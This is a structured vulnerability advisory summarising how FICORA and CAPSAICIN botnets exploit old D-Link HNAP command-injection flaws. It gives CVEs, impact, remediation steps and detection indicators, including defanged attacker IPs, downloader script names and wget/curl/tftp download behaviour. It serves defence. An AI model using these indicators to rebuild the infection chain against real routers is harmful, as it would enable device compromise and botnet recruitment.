Full Report
Cybersecurity researchers are warning about a spike in malicious activity that involves roping vulnerable D-Link routers into two different botnets, a Mirai variant dubbed FICORA and a Kaiten (aka Tsunami) variant called CAPSAICIN. "These botnets are frequently spread through documented D-Link vulnerabilities that allow remote attackers to execute malicious commands via a GetDeviceSettings
Analysis Summary
# Vulnerability: Old D-Link Router Vulnerabilities Exploited by FICORA and CAPSAICIN Botnets
## CVE Details
- CVE ID: Multiple, including CVE-2015-2051, CVE-2019-10891, CVE-2022-37056, and CVE-2024-33112
- CVSS Score: Not specified in detail, but severity is high given active exploitation.
- CWE: Likely improper input validation or insecure configuration related to the HNAP interface.
## Affected Systems
- Products: D-Link Routers (various models, as the issue is related to legacy protocol implementation).
- Versions: Devices running older, unpatched firmware that contain the vulnerable HNAP interface implementation.
- Configurations: Devices using the Home Network Administration Protocol (HNAP) interface.
## Vulnerability Description
The vulnerability resides in the D-Link Home Network Administration Protocol (HNAP) interface. Remote attackers can exploit a documented weakness to execute arbitrary malicious commands on the affected router by sending specially crafted requests to the `GetDeviceSettings` action. This flaw has existed for almost a decade, leading to the compromise of devices by botnets like FICORA (a Mirai variant) and CAPSAICIN (a Kaiten/Tsunami variant).
## Exploitation
- Status: Exploited in the wild by the FICORA and CAPSAICIN botnets in global campaigns.
- Complexity: Low (inherent in the documentation of the decade-old vulnerability).
- Attack Vector: Network (Remote Command Execution via HNAP).
## Impact
- Confidentiality: High (Potential for data exposure depending on device function).
- Integrity: High (System compromise, installation of malware).
- Availability: High (Devices are assimilated into DDoS botnets, leading to resource exhaustion).
## Remediation
### Patches
The article implies that patches exist for the various CVEs listed, focusing on updating D-Link firmware to versions that remediate the underlying HNAP flaw. Specific patch versions are not listed in the provided text, users must check official D-Link advisories for their specific model.
### Workarounds
1. **Disable HNAP:** If possible, disable the Home Network Administration Protocol (HNAP) interface on the affected D-Link routers.
2. **Block External Access:** Ensure the HNAP interface (typically accessible via specific ports/paths) is not exposed to the public internet, limiting access to the local network only.
## Detection
- **FICORA Infection:** Look for downloaders deploying a shell script named `"multi"` originating from IP `103.149.87[.]69`, followed by downloads across various Linux architectures using `wget`, `ftpget`, `curl`, and `tftp`. The malware includes a brute-force function.
- **CAPSAICIN Infection:** Look for the downloader script named `"bins.sh"` originating from IP `87.10.220[.]221`. The malware actively kills processes associated with known botnets, indicating resource contention.
- **General Detection:** Look for unusual outbound network activity, unexpected CPU spikes, or processes attempting to kill established service daemons, indicative of botnet hijacking.
## References
- Vendor Advisories: Users must consult Fortinet FortiGuard Labs analysis and D-Link security bulletins referencing CVE-2015-2051, CVE-2019-10891, CVE-2022-37056, and CVE-2024-33112.
- Relevant links:
- hxxps://www.fortinet.com/blog/threat-research/botnets-continue-to-target-aging-d-link-vulnerabilities
- NVD entry for CVE-2015-2051
- NVD entry for CVE-2019-10891
- NVD entry for CVE-2022-37056
- NVD entry for CVE-2024-33112